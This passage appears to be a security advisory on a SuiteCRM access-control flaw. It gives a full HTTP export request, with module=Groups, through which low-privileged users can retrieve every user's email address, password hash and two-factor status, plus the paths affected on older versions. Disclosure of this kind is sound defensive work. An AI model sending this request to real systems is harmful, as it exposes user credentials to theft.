The web application incorrectly returns sensitive data to authenticated lower privileged users when making requests to export data from the ‘Groups’ module. This includes information such as the user’s email address, password hash and whether two-factor authentication is configured.
To export sensitive information for all users on the application, the following request could be sent (version 8.3
):
POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
module=Groups&action=index
The attack can be exploited on versions 7.12.9
and 7.13.4
by sending the request to /index.php?entryPoint=export
instead.
The native intension of this functionality appears to be allowing users to export data from tables based on the module page they’re viewing. The testing team enumerated all of the modules present in the application and began sending a series of requests to export data whilst changing the value of the module
parameter to each module previously identified. From our testing, it appears only the Groups
modules returns overly permissive data.